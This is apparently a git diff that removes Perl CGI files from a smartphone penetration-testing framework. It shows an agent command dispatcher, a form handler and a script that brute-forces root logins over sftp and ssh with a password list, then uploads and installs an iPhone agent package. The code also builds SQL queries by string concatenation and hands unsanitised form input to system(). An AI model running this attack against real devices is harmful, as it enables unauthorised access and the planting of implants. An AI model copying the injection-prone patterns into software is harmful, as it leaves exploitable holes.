- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $selectquery = "SELECT path from agents where number=" . "\'" . $agent . "\'";
- $selectquery2 = "SELECT controlkey from agents where number=" . "\'" . $agent . "\'";
- $selectquery3 = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
-
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $selectquery = "SELECT path from agents where number=" . $agent;
- $selectquery2 = "SELECT controlkey from agents where number=" . $agent;
- $selectquery3 = "SELECT id from modems where number=" . $modemNo;
-
-
- }
-
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path = @rows[0];
- $sql = $dbh->prepare($selectquery2);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key = @rows[0];
-if ($returnmethod eq "SMS")
- {
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " " . "SMSS" . " " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
- }
- if ($deliverymethod eq "SMS")
- {
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
- }
-
-
- }
- if ($returnmethod eq "HTTP")
- {
- if ($deliverymethod eq "HTTP")
- {
- $command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
- }
- if ($deliverymethod eq "SMS")
- {
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
-}
-}
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
-
-
View
44 frameworkgui/guessPassword.pl
@@ -1,44 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$ipAddress = $FORM{"ipAddressTB"};
-$passwordFile = $FORM{"passwordFileTB"};
-
-
-##----- put your code here
- $startcommand = "perl guessattack.pl " . $ipAddress . " " . $passwordFile;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
-
- system($startcommand);
-
-
- }
-
-
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
View
96 frameworkgui/guessattack.pl
@@ -1,96 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-use Expect;
-
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
-$ipaddress = $ARGV[0];
-$passfile = $ARGV[1];
- $vulnerable = "no";
- $agent = "no";
- $command = 'sftp';
- $param = "root@" . $ipaddress;
- $timeout = 10;
- $notfound = "ssh: connect to host " . $ipaddress . " port 22: Connection refused";
- $passwordstring = $parm . "'s password: ";
- $location = $Variables{"IPHONEAGENT"};
- $putfile = $location;
- $connectstring = "Connecting to " . $ipaddress . "...";
- $installcommand = "dpkg -i " . "iphone.deb" . "\n";
- $guesspassword = "null";
- open(READFILE, "+<$passfile");
- while(<READFILE>)
- {
- $guess = $_;
- $guess2 = $guess . "\n";
- $exp = Expect->spawn($command, $param) or die "Cannot spawm sftp command";
- $exp->expect($timeout,[$connectstring]);
- $exp->expect($timeout,["Are you sure you want to continue connecting (yes/no)?", sub {my $self = shift; $self->send("yes\n");}]); #[$notfound, return]);
- $exp->expect($timeout, $passwordstring);
- $exp->send($guess2);
- if ($exp->expect($timeout, ["sftp>"]))
- {
- $vulnerable="yes";
- $guesspassword = $guess;
- $exp->send("put $putfile\n");
- $exp->expect($timeout, ["sftp>"]);
- $exp->send("bye\n");
- $command2 = "ssh";
- $exp = Expect->spawn($command2, $param);
- $exp->expect($timeout, $passwordstring);
- $exp->send($guess2);
- $exp->expect($timeout, [qr'root\s*']);
- $exp->send($installcommand);
- $exp->expect($timeout, "Setting up com.bulbsecurity.tooltest (0.0.1-23) ...");
- $exp->send("tooltest\n");
- if($exp->expect($timeout,["Smartphone Pentest Framework Agent"]))
- {
- $agent="yes";
- }
- $exp->send("exit");
- $exp->soft_close();
- last;
- }
- }
- $table = "remote";
- $guessstring = "Guess: " . $guesspassword;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $ip2 = "\'" . $ipaddress . "\'";
- $vulnerable2 = "\'" . $vulnerable . "\'";
- $agent2 = "\'" . $agent . "\'";
- $exploit = "\'" . $guessstring . "\'";
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $ip2 = "\"" . $ipaddress . "\"";
- $vulnerable2 = "\"" . $vulnerable . "\"";
- $agent2 = "\"" . $agent . "\"";
- $exploit = "\"" . $guessstring . "\"";
- }
- $insertquery = "INSERT INTO $table (id,ip,exploit,vuln,agent) VALUES (DEFAULT,$ip2,$exploit,$vulnerable2,$agent2)";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
-
-
-
View
BIN frameworkgui/iphone.deb
Binary file not shown.
View
BIN frameworkgui/littleBulb.jpg
Deleted file not rendered
View
560 frameworkgui/menu.pl
@@ -1,560 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-$dir = getcwd;
-$configfile = $dir . "/config";
- open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
</